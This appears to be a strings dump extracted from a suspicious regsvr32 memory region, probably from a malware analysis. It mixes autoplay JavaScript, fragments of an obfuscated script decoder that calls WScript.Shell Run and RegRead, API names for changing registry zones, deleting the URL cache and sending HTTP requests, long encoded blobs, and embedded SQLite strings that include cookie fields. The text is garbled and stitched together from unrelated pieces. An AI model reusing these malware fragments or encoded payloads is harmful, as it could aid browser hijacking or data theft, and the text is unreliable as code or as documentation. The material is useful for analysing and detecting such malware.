try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp4
IWebBrowser2l
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
3,313[3`3
829<9]9~9
=.=3=[=`=
>!>&>7><>
7)707;7@7
= =$=,=_=
?0'101>1
: :&: :}:
?,?;?@?^?
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c 
jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA 
OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c 
GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 
x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_3384_rwx_009B0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
